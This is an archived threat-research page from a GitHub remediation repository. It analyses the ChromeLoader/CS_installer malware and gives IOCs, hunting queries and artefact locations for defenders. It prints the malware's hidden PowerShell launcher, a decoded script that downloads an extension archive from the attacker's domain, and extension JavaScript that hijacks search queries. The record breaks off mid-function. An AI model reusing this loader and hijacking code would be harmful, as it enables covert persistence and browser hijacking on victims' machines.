{
	"id": "23227f5d-2255-4b45-8fb3-b69f6b1e36b4",
	"created_at": "2026-04-06T00:06:36.464156Z",
	"updated_at": "2026-04-10T03:31:13.356276Z",
	"deleted_at": null,
	"sha1_hash": "12dd4a9ac63cde364293c6cb9b7e444cf601abcd",
	"title": "Threat-Remediation-Scripts/Threat-Track/CS_INSTALLER at main · xephora/Threat-Remediation-Scripts",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 504891,
	"plain_text": "Threat-Remediation-Scripts/Threat-Track/CS_INSTALLER at main · xephora/Threat-Remediation-Scripts\r\nBy xephora\r\nArchived: 2026-04-05 17:55:38 UTC\r\nObserved malicious IOCs for the ChromeLoader/CS_installer (aka Choziosi Loader) malware\r\nCrowdStrike queries to hunt for ChromeLoader\r\nChromeLoader ScriptContent!=null\r\n| dedup ComputerName\r\n| rex field=ScriptContent \"(?\u003cMaliciousDomain\u003e(\\$domain = \\\"[a-zA-Z0-9.]*.))\"\r\n| table _time ComputerName ScriptContent MaliciousDomain\r\nCommandLine=\"*CS_installer.exe*\" FilePath=\"*CdRom*\"\r\n| dedup ComputerName\r\n| table _time ComputerName CommandLine FilePath SHA256HashData\r\nSigma rule for ChromeLoader available (thanks to Twitter user @Kostastsale)\r\nTwitter Reference: https://twitter.com/Kostastsale/status/1480821678145826818\r\nSigma Rule: https://github.com/tsale/Sigma_rules/blob/main/malware/ChromeLoader.yml\r\nDate of first occurrence\r\n01-02-2022\r\nDescription:\r\nCS_installer/ChromeLoader starts off as an ISO that masquerades as video game cheats, illegal software or freeware, and is also advertised on Twitter via QR codes. It was observed that the malicious ISO was downloaded as a zipped archive. Once downloaded and extracted, the victim runs the ISO on their machine, which on Windows 10 or above mounts it as a disk. The ISO contains a malicious binary named CS_installer.exe (also seen as setup.exe) and a Win32 Task Scheduler API library (Microsoft.Win32.TaskScheduler.dll), along with configuration files and a symbols file. Once mounted, the folder containing the malicious binary is locked and will not be removed by the antivirus client; the disk image must be dismounted to release the binary. Upon execution of the binary CS_installer.exe, numerous persistence mechanisms are created and a Chrome extension is downloaded and saved to disk. Once the extension is saved, it extracts the data and installs it into Chrome. 
The persistence is configured to execute a PowerShell command that runs a base64 encoded payload which ensures the Chrome extension remains on the machine. It was also observed that the PowerShell command removes the previously registered scheduled task before creating it again and repeats the Chrome extension installation process.\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 1 of 18\n\nSample Analysis\r\nhttps://app.any.run/tasks/bfb74c9f-89d0-4c3b-8c65-233677cdbfc5\r\nDomains Observed\r\nhxxps[://]learnataloukt[.]xyz\r\nhxxps[://]brokenna[.]work\r\nhxxps[://]yflexibilituky[.]co\r\nhxxps[://]ktyouexpec[.]xyz reported by Twitter user @th3_protoCOL https://twitter.com/th3_protoCOL/st\r\nhxxps[://]withyourret[.]xyz reported by Twitter user @th3_protoCOL https://twitter.com/th3_protoCOL/st\r\nhxxps[://]bosscast[.]net reported by Twitter user @cbecks_2\r\nhxxps[://]soap2day[.]ac reported by Twitter user @cbecks_2\r\nhxxps[://]wallpaperaccess[.]com reported by Twitter user @cbecks_2\r\nhxxps[://]uploadhaven[.]com reported by Twitter user @cbecks_2 and @ffforward https://twitter.com/fffo\r\nhxxps[://]steamunlocked[.]net reported by Twitter user @ffforward https://twitter.com/th3_protoCOL/statu\r\nhxxps[://]etterismype[.]co reported by Twitter user @cbecks_2 https://twitter.com/cbecks_2/status/14809941\r\nhxxps[://]downloadfree101.com reported by Twitter user @StopMalvertisin https://twitter.com/StopMalverti\r\nhxxps[://]ithconsukultin[.]com reported by Twitter user @Enadanil https://twitter.com/Enadanil/status/148\r\nhxxps[://]tobepartou[.]com reported by Twitter user @Enadanil https://twitter.com/Enadanil/status/148\r\nhxxps[://]yeconnected[.]com\r\nhxxps[://]idwhitdoe[.]work\r\nMalicious ISO\r\nThe naming convention of the ISOs appears to target young adults. 
These names seem to change consistently with each infection.\r\nUniversal Chat Spammer.iso\r\nRoblox Muscle Legends Script _ AutoFarm + More ....iso\r\n[UPDATED] Bee Swarm Simulator Script GUI _ Hack....iso\r\nThis_Young_Maidenhead_Family_Now_Makes_15800_..._1.iso\r\nThe Sims 4 [w_ ALL DLC] Free Download.iso\r\nHow To Install Shaders For Minecraft 1.18.1_1....iso =\u003e reported by reddit user remuchiiee\r\nTwisted Lies by Shandi Boyes.iso\r\nFile_ BONEWORKS.v1.6.zip ....iso\r\nhttps://www.virustotal.com/gui/file/fa52844b5b7fcc0192d0822d0099ea52ed1497134a45a2f06670751ef5b33cd3\r\nhttps://www.virustotal.com/gui/file/b43767a9b780ba91cc52954aa741be1bddb0905b492e481aea992bca2a0c6a93\r\nhttps://www.virustotal.com/gui/file/860c1f6f3393014fd84bd29359b4200027274eb6d97ee1a49b61e038d3336372\r\nhttps://www.virustotal.com/gui/file/ad68453553a84e03c70106b7c13a483aa9ff1987621084e22067cb1344f52ab7\r\nhttps://www.virustotal.com/gui/file/cd999181de69f01ec686f39ccf9a55131a695c55075d530a44f251a8f41da7c8\r\nhttps://www.virustotal.com/gui/file/0fb038258bbbc61d4f43cac585ec92c79a9a231bcd265758c23c78f96ac1dbb2\r\nhttps://www.virustotal.com/gui/file/3fc00a37c13ee987ec577a8fd2c9daae31ec482c5276208ddff4bc5cb518c2f3\r\nhttps://www.virustotal.com/gui/file/e132de4b3b6b6135121c809e43c0adf3ebf10cb92e7b3c989c24c68ed970a6e6\r\nhttps://www.virustotal.com/gui/file/03b2f267de27dae24de14e2c258a18e6c6d11581e6caee3a6df2b7f42947d898\r\nhttps://www.virustotal.com/gui/file/e449eeade197cab542b6a11a3bcb972675a1066a88cfb07f09e7f7cbd1d32f6d\r\nhttps://www.virustotal.com/gui/file/785f4ee0b26aac97429cdf99b04d2dab44798f2554b61512b49b59f834e91250\r\nhttps://www.virustotal.com/gui/file/e1f9968481083fc826401f775a3fe2b5aa40644b797211f235f2adbeb0a0782f\r\nAdditional hashes reported by Twitter user 
@cbecks_2\r\n0ecbe333ec31a169e3bce6e9f68b310e505dedfed50fe681cfd6a6a26d1f7f41\r\n1717de403bb77e49be41edfc398864cfa3e351d9843afc3d41a47e5d0172ca79\r\n18073ce19f3391f82c649a244b5555a88124fb6f496c28a914aa0f4ce139e3f2\r\n1b4786ecc9b34f30359b28f0f89c0af029c7efc04e52832ae8c1334ddd2b631e\r\n2e006a8e9f697d8075ba68ab5c793670145ea56028c488f1a00b29738593edfb\r\n31b2944fb4d13a288497e64b2c4a110127e3f685fae38860aaf68336f7804d13\r\n3927e4832dcbfae7ea9e2622af2a37284ceaf93b86434f35878e0077aeb29e7e\r\n41cc04487a80093df4ac9bb64afc44eb6492bb49fc125b4601cd53476f18d5a4\r\n614e2c3540cc6b410445c316d2e35f20759dd091f2f878ddf09eda6ab449f7aa\r\n66f2ade2a78843c91445f808673d6ae0fe3a13402faac2962f04544a62ffbc2d\r\n6d89c1cd593c2df03cdbd7cf3f58e2106ff210eeb6f60d5a4bf3b970989dee2e\r\n8840f385340fad9dd452e243ad1a57fb44acfd6764d4bce98a936e14a7d0bfa6\r\n9ab4665f627e17377f7feda1d3ca4facb5448db587d4d22d2740585ab3fb1f54\r\n9dd11c756bdf612f372f3d37410bcc469f586f2fc826df5c679b3e77501c9371\r\na9670d746610c3be342728ff3ba8d8e0680b5ac40f4ae6e292a9a616a1b643c8\r\nbcc6cfc82a1dc277be84f28a3b3bb037aa9ef8be4d5695fcbfb24a1033174947\r\ndd2da35d1b94513f124e8b27caff10a98e6318c553da7f50206b0bfded3b52c9\r\nedeec82c65adf5c44b52fbdc4b7ff754c6bd391653bba1e0844f0cab906a5baf\r\nfb9cce7a3fed63c0722f8171e8167a5e7220d6f8d89456854c239976ce7bb5d6\r\nThe mounted ISO mainly contains:\r\n\\Device\\CdRom0\\CS_INSTALLER.EXE (also seen as setup.exe)\r\n\\Device\\CdRom0\\CS_installer.exe.config\r\n\\Device\\CdRom0\\CS_installer.pdb\r\n\\Device\\CdRom0\\Microsoft.Win32.TaskScheduler.dll\r\n\\Device\\CdRom0\\_meta.txt\r\nCS_installer samples\r\nhttps://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd\r\nhttps://www.virustotal.com/gui/file/5f57a4495b9ab853b9d2ab7d960734645ebe5765e8df3b778d08f86119e1695c\r\nhttps://www.virustotal.com/gui/file/187e08fca3ea9edd8340aaf335bd809a9de7a10b2ac14651ba292f478b56d180\r\nhttps://www.virustotal.com/gui/file/1dbe5c2feca1706fafc6f767cc16427a2237ab05d95f94b84c287421ec97c224\r\nhttps://www.virustotal.com/gui/file/5c07178b0c44ae71310571b78dde5bbc7dc8ff4675c20d44d5b386dfb4725558\r\nhttps://www.virustotal.com/gui/file/42afb7100d3924915fde289716def039cd14d8116757061df503874217d9b047\r\nhttps://www.virustotal.com/gui/file/2df0cf38c8039745f0341fc679d1dd7a066ec0d2e687c6914d2a2256f945d96d\r\nReported by Twitter user @cbecks_2\r\nhttps://www.virustotal.com/gui/file/aed9351ff414ddf1ecbfeb747b0bc6d650fcf026290cb670cbbaaad02fdf3dcd\r\nReported by Twitter user @cbecks_2\r\nhttps://www.virustotal.com/gui/file/dca529c6ec9ea1f638567d5b6c34af4f47a80c0519178c4829becc337db5be02\r\nReported by Twitter user @cbecks_2\r\nAdditional CS_installer.exe hashes added 01-24-2022\r\n9eca0cd45c00182736467ae18da21162d0715bd3d53b8df8d92a74a76a89c4a0\r\n564e913a22cf90ede114c94db8a62457a86bc408bc834fa0e12e85146110c89b\r\nc56139ea4ccc766687b743ca7e2baa27b9c4c14940f63c7568fc064959214307\r\n53347d3121764469e186d2fb243f5c33b1d768bf612cc923174cd54979314dd3\r\n44464fb09d7b4242249bb159446b4cf4c884d3dd7a433a72184cdbdc2a83f5e5\r\nafc8a5f5f8016a5ce30e1d447c156bc9af5f438b7126203cd59d6b1621756d90\r\n2d4454d610ae48bf9ffbb7bafcf80140a286898a7ffda39113da1820575a892f\r\nObserved behavior\r\nReads hostname\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\r\nOS Credential Dumping\r\nDNSCompatibility.exe\r\nChecks Windows Trust Settings\r\nHKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUSTPROVIDERS\\SOFTWARE\r\nReads settings of System Certificates\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\305F8BD17AA2CBC483A4C41B19A39A05DA39D6\r\nChecks supported languages\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\r\nEnvironment 
Variables\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\r\nChecks Windows Installation Data\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\r\nEnumeration of Software\r\nDNSCompatibility.exe\r\nScheduled Task\r\nChromeLoader uses the Windows Task Scheduler API (Microsoft.Win32.TaskScheduler) to create a scheduled task.\r\nChromeLoader picks the scheduled task name at random from a dictionary.\r\nstring[] namesDict = new string[]\r\n{\r\n    \"Loader\",\r\n    \"Monitor\",\r\n    \"Checker\",\r\n    \"Conf\",\r\n    \"Task\",\r\n    \"Updater\"\r\n};\r\nint nameIndex = new Random().Next(namesDict.Length);\r\nstring taskName = \"Chrome\" + namesDict[nameIndex];\r\nts.RootFolder.RegisterTaskDefinition(taskName, td);\r\nThe resulting task name is therefore one of:\r\nChromeLoader\r\nChromeMonitor\r\nChromeChecker\r\nChromeConf\r\nChromeTask\r\nChromeUpdater\r\nThe scheduled task contains the following command, which executes a PowerShell command with a base64 payload.\r\ncmd /c start /min \"\" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E \u003cbase64EncodedPayload\u003e\r\nI have observed two scenarios of how the base64 payload is executed.\r\n1. A descramble function exists that reconstructs the base64 payload from _meta.txt using a character substitution dictionary.\r\nDictionary\u003cchar, char\u003e replaceDict = new Dictionary\u003cchar, char\u003e\r\n{\r\n    \u003cdictionary of characters\u003e\r\n};\r\nstring res = \"\";\r\nforeach (char c in File.ReadAllText(\"_meta.txt\"))\r\n{\r\n    if (replaceDict.ContainsKey(c))\r\n    {\r\n        res += replaceDict[c].ToString();\r\n    }\r\n    else\r\n    {\r\n        res += c.ToString();\r\n    }\r\n}\r\nreturn res;\r\n2. The PowerShell command may be hardcoded into the malware binary CS_installer.exe. 
Shown in the images below.\r\nRetrieving ChromeLoader scheduled tasks using PowerShell\r\nGet-ScheduledTask -Taskname \"ChromeLoader\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeTask\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeConf\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeUpdater\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeMonitor\" -EA SilentlyContinue\r\nGet-ScheduledTask -Taskname \"ChromeChecker\" -EA SilentlyContinue\r\nScheduled Task Location #1\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeLoader\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeTask\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeConf\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeMonitor\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeUpdater\r\nLocation 1: C:\\windows\\system32\\tasks\\ChromeChecker\r\nContents of the scheduled task\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n  \u003cRegistrationInfo\u003e\r\n    \u003cDate\u003e2022-01-08T12:48:01.586-05:00\u003c/Date\u003e\r\n    \u003cDescription\u003eExample task\u003c/Description\u003e\r\n    \u003cURI\u003e\\ChromeLoader\u003c/URI\u003e\r\n  \u003c/RegistrationInfo\u003e\r\n  \u003cTriggers\u003e\r\n    \u003cTimeTrigger\u003e\r\n      \u003cRepetition\u003e\r\n        \u003cInterval\u003ePT10M\u003c/Interval\u003e\r\n        \u003cStopAtDurationEnd\u003efalse\u003c/StopAtDurationEnd\u003e\r\n      \u003c/Repetition\u003e\r\n      \u003cStartBoundary\u003e2022-01-08T12:49:01.55-05:00\u003c/StartBoundary\u003e\r\n      \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n    \u003c/TimeTrigger\u003e\r\n  \u003c/Triggers\u003e\r\n  \u003cSettings\u003e\r\n    \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n    
\u003cDisallowStartIfOnBatteries\u003etrue\u003c/DisallowStartIfOnBatteries\u003e\r\n    \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\r\n    \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n    \u003cStartWhenAvailable\u003efalse\u003c/StartWhenAvailable\u003e\r\n    \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n    \u003cIdleSettings\u003e\r\n      \u003cDuration\u003ePT10M\u003c/Duration\u003e\r\n      \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\r\n      \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n      \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n    \u003c/IdleSettings\u003e\r\n    \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n    \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n    \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n    \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n    \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n    \u003cExecutionTimeLimit\u003ePT72H\u003c/ExecutionTimeLimit\u003e\r\n    \u003cPriority\u003e7\u003c/Priority\u003e\r\n  \u003c/Settings\u003e\r\n  \u003cActions Context=\"Author\"\u003e\r\n    \u003cExec\u003e\r\n      \u003cCommand\u003ecmd\u003c/Command\u003e\r\n      \u003cArguments\u003e/c start /min \"\" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABo\r\nScheduled Task Location #2\r\nChromeLoader creates one of the following registry keys for the scheduled task\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeLoade\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeTask\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeConf\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeMonito\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeUpdate\r\nLocation 2: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\TREE\\ChromeChecke\r\nContents of the registry key\r\nProperty Type Value\r\n-------- ---- -----\r\nSD Binary (0x)01,00,04,80,94,00,00,00,b0,00,00,00,00,00,00,00,14,00,00,00,02,00,80,00,04,00,00,00,00,10,18\r\n 5,20,00,00,00,20,02,00,00,00,10,14,00,9f,01,1f,00,01,01,00,00,00,00,00,05,12,00,00,00,00,10,24,0\r\n 15,00,00,00,79,7b,4c,2a,f0,c4,03,8b,df,0b,88,58,ea,03,00,00,00,00,24,00,89,00,12,00,01,05,00,00,\r\n ,c4,03,8b,df,0b,88,58,ea,03,00,00,00,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,79,7b,4c,2a,f0\r\n 5,00,00,00,00,00,05,15,00,00,00,79,7b,4c,2a,f0,c4,03,8b,df,0b,88,58,01,02,00,00\r\nId String {95F41003-19E5-4FEF-BC34-BD6B24044329}\r\nIndex DWord 3\r\nScheduled Task Location #3\r\nChromeLoader also creates one of the following registry keys.\r\nLocation 3: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{X-X-X-X-X}\r\n(To save time, you can retrieve the task's unique identifier by running one of the PowerShell commands below.)\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeLoader\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeTask\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeConf\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String 
\"ChromeMonitor\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeChecker\"\r\nGet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\" | Select-String \"ChromeUpdater\"\r\nContents of the registry key {X-X-X-X-X}\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{53998BBE-E665-4C14-8F\r\nProperty Type Value\r\n-------- ---- -----\r\nPath String \\ChromeLoader\r\nHash Binary (0x)c7,eb,cd,26,ec,d5,2f,5d,59,55,18,03,21,85,e3,c6,32,dc,05,59,2b,1b,d8,04,dc,3f,8c,74,11,b5\r\nSchema DWord 65538\r\nDate String 2022-01-06T13:27:37.271-05:00\r\nDescription String Example task\r\nURI String \\ChromeLoader\r\nTriggers Binary (0x)17,00,00,00,00,00,00,00,00,07,01,00,00,00,06,00,80,b8,45,38,2b,03,d8..[TRUNCATION]\r\nActions Binary (0x)03,00,0c,00,00,00,41,00,75,00,74,00,68,00,6f,00,72,00,66,66..[TRUNCATION]\r\nDynamicInfo Binary (0x)03,00,00,00,98,86,ad,14,2b,03,d8,01,aa,f5,5b,ad,52,06,d8,01,..[TRUNCATION]\r\nSnippet of the base64 decoded PowerShell script\r\n$extPath = \"$($env:LOCALAPPDATA)\\chrome\"\r\n$confPath = \"$extPath\\conf.js\"\r\n$archiveName = \"$($env:LOCALAPPDATA)\\archive.zip\"\r\n$taskName = \"ChromeLoader\"\r\n$domain = \"SomeMaliciousDomain\"\r\n$isOpen = 0\r\n$dd = 0\r\n$ver = 0\r\n(Get-WmiObject Win32_Process -Filter \"name='chrome.exe'\") | Select-Object CommandLine | ForEach-Objec\r\nif($_ -Match \"load-extension\"){\r\nbreak\r\n}\r\n$isOpen = 1\r\n}\r\nif($isOpen){\r\nif(-not(Test-Path -Path \"$extPath\")){\r\ntry{\r\nwget \"https://$domain/archive.zip\" -outfile \"$archiveName\"\r\n}catch{\r\nbreak\r\n}\r\nExpand-Archive -LiteralPath \"$archiveName\" -DestinationPath \"$extPath\" -Force\r\nRemove-Item -path \"$archiveName\" 
-Force\r\n}\r\nelse{\r\ntry{\r\nif (Test-Path -Path \"$confPath\")\r\n{\r\n$conf = Get-Content -Path $confPath\r\n$conf.Split(\";\") | ForEach-Object {\r\nif ($_ -Match \"dd\")\r\n{\r\n$dd = $_.Split('\"')[1]\r\n}elseif ($_ -Match \"ExtensionVersion\")\r\n{\r\n$ver = $_.Split('\"')[1]\r\n}\r\n}\r\n}\r\n}catch{}\r\nif ($dd -and $ver){\r\ntry{\r\n$un = wget \"https://$domain/un?did=$dd\u0026ver=$ver\"\r\nif($un -Match \"$dd\"){\r\nUnregister-ScheduledTask -TaskName \"$taskName\" -Confirm:$fals\r\nRemove-Item -path \"$extPath\" -Force -Recurse\r\n}\r\n}catch{}\r\ntry{\r\nwget \"https://$domain/archive.zip?did=$dd\u0026ver=$ver\" -outfile \"$archiv\r\n}\r\ncatch{}\r\nif (Test-Path -Path \"$archiveName\"){\r\nExpand-Archive -LiteralPath \"$archiveName\" -DestinationPath \"$extPath\r\nRemove-Item -path \"$archiveName\" -Force\r\n}\r\n}\r\n}\r\ntry{\r\nGet-Process chrome | ForEach-Object { $_.CloseMainWindow() | Out-Null}\r\nstart chrome --load-extension=\"$extPath\", --restore-last-session, --noerrdialogs, --d\r\n}catch{}\r\n}\r\nDropped Extension location\r\nC:\\users\\\u003cProfile\u003e\\appdata\\local\\chrome\r\nMalicious Extension\r\nsha256sum archive.zip\r\n561f219a76e61d113ec002ecc4c42335f072be0f2f23e598f835caba294a3f9b archive.zip\r\nContents:\r\nbackground.js conf.js manifest.json options.png\r\nSample Extension Configuration\r\ncat conf.js\r\nlet _ExtnensionName = \"Options\";\r\nlet _ExtensionVersion = \"4.0\";\r\nlet _dd = \"MzQ1NDYHAQICAwIGDAEAAgEFAgILBwAMSgoABgYDB0gEAgICAgUHAwAASQ==\";\r\nlet _ExtDom = \"https://krestinaful[.]com/\";\r\nlet _ExtDomNoSchema = \"krestinaful[.]com\"\r\ncat conf.js\r\nlet _ExtnensionName = \"Properties\";\r\nlet _ExtensionVersion = \"4.4\";\r\nlet _dd = \"NzI3MjcGAgYEDwAHAgAFAQQGAwAOAgYASwAKAAYEBU4GBAMGCgQKDwAASw==\";\r\n
let _ExtDom = \"https://tobepartou[.]com/\";\r\nlet _ExtDomNoSchema = \"tobepartou[.]com\";\r\nObfuscated JavaScript background.js (truncated)\r\ncat background.js\r\nT1MM.q3 = (function () {\r\n var v = 2;\r\n for (; v !== 9;) {\r\n switch (v) {\r\n case 2:\r\n v = typeof globalThis === 'object' ? 1 : 5;\r\n break;\r\n case 1:\r\n return globalThis;\r\n break;\r\n case 5:\r\n var G;\r\n try {\r\n var s = 2;\r\n for (; s !== 6;) {\r\n switch (s) {\r\n case 2:\r\n Object['defineProperty'](Object['prototype'], 'xbHiy', {\r\n 'get': function () {\r\n var J = 2;\r\n for (; J !== 1;) {\r\n switch (J) {\r\n case 2:\r\n return this;\r\n break;\r\n }\r\n }\r\n },\r\n 'configurable': true\r\n });\r\n G = xbHiy;\r\n s = 5;\r\n break;\r\n case 5:\r\n G['QQr8M'] = G;\r\n s = 4;\r\n break;\r\n case 4:\r\n s = typeof QQr8M === 'undefined' ? 3 : 9;\r\n break;\r\n case 9:\r\n delete G['QQr8M'];\r\n var N = Object['prototype'];\r\n delete N['xbHiy'];\r\n s = 6;\r\n break;\r\n case 3:\r\n throw \"\";\r\n s = 9;\r\n break;\r\n }\r\n }\r\n } catch (l) {\r\n G = window;\r\n }\r\n return G;\r\n break;\r\n }\r\n }\r\n})();\r\nT1MM.A1MM = A1MM;\r\ne7(T1MM.q3);\r\n[TRUNCATION..]\r\nRaw obfuscated JavaScript sample\r\nU0MM.i5=(function(){var A=2;for(;A !== 9;){switch(A){case 5:var h;try{var m=2;for(;m !== 6;){switch(m\r\nDeobfuscated JavaScript background.js provided by Twitter user @struppigel\r\nhttps://twitter.com/struppigel\r\nBlog post created by Karsten Hahn @struppigel, providing an analysis of the malicious Chrome extension\r\nhttps://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension\r\nhttps://twitter.com/struppigel/status/1489500184371515396\r\nThe purpose of the malicious Chrome extension is to generate ad revenue for the actor. The Chrome extension periodically makes web requests every 30 minutes to generate ads. 
Analytics are sent to the attacker's domain every 3 hours. This malware has the capability of spreading through the victim's Google profile via synchronization.\r\nTurn Google Chrome synchronization on and off\r\nhttps://support.google.com/chrome/answer/185277?hl=en\u0026co=GENIE.Platform%3DDesktop\r\nhttps://support.google.com/chrome/answer/2765944\r\nchrome.webRequest.onBeforeSendHeaders.addListener(n4 =\u003e {\r\n n4.requestHeaders.push({name: \"dd\", value: _dd});\r\n return {requestHeaders: n4.requestHeaders};\r\n}, {urls: [\"*://*.\" + _ExtDomNoSchema + \"/*\"]}, [\"blocking\", \"requestHeaders\"]);\r\nchrome.webRequest.onHeadersReceived.addListener(g4 =\u003e {\r\n if (g4.type !== \"main_frame\") {\r\n return null;\r\n }\r\n g4.responseHeaders.forEach(u4 =\u003e {\r\n if (u4.name === \"is\") {\r\n isValue = u4.value;\r\n setWithExpirySec(\"is\", isValue, 300);\r\n return null;\r\n }\r\n });\r\n}, {urls: [\"*://*.\" + _ExtDomNoSchema + \"/*\"]}, [\"responseHeaders\"]);\r\nchrome.webRequest.onBeforeRequest.addListener(function (s4) {\r\n var O4, L4, R4, r4, p4, F4, i4, w4, b4;\r\n if (s4.type !== \"main_frame\") {\r\n return null;\r\n }\r\n O4 = s4.url;\r\n L4 = new URL(O4);\r\n if (O4.indexOf(\"google.\") \u003e= 0 \u0026\u0026 O4.indexOf(\"search\") \u003e= 0 \u0026\u0026 O4.indexOf(\"q=\") \u003e= 0) {\r\n R4 = L4.searchParams.get(\"q\");\r\n }\r\n if (O4.indexOf(\"search.yahoo.\") \u003e= 0 \u0026\u0026 O4.indexOf(\"p=\") \u003e= 0) {\r\n R4 = L4.searchParams.get(\"p\");\r\n }\r\n if (O4.indexOf(\"bing.\") \u003e= 0 \u0026\u0026 O4.indexOf(\"search\") \u003e= 0 \u0026\u0026 O4.indexOf(\"q=\") \u003e= 0) {\r\n R4 = L4.searchParams.get(\"q\");\r\n }\r\n if (R4 \u0026\u0026 R4.length \u003e 1) {\r\n r4 = getWithExpiry(\"lastQuery\");\r\n p4 = Math.floor(Math.random() * 100);\r\n F4 = getWithExpiry(\"is\") || 100;\r\n i4 = s4.initiator;\r\n w4 = 
0;\r\n if (i4) {\r\n if (i4.includes(\"bing.\")) {\r\n w4 = 1;\r\n }\r\n if (i4.includes(\"yahoo.\")) {\r\n w4 = 1;\r\n}\r\n }\r\n if (F4 \u003e p4 \u0026\u0026 w4 \u0026\u0026 r4) {\r\n setWithExpirySec(\"lastQuery\", R4, 60);\r\n return null;\r\n }\r\n if (R4 === r4) {\r\n return null;\r\n }\r\n setWithExpirySec(\"lastQuery\", R4, 60);\r\n b4 = _ExtDom + \"search?ext=\" + _ExtnensionName + \"\u0026ver=\" + _ExtensionVersion + \"\u0026is=\" + w4 + \"\u0026q=\r\n chrome.tabs.update({url: b4});\r\n }\r\n}, {urls: [\"https://*.google.com/*\", \"https://*.yahoo.com/*\", \"https://*.bing.com/*\"]}, [\"blocking\"]\r\nfunction getWithExpiry(N4) {\r\n var z4, Q4, I4;\r\n z4 = localStorage.getItem(N4);\r\n if (!z4) {\r\n return null;\r\n }\r\n Q4 = JSON.parse(z4);\r\n I4 = new Date;\r\n if (I4.getTime() \u003e Q4.expiry) {\r\n localStorage.removeItem(N4);\r\n return null;\r\n }\r\n return 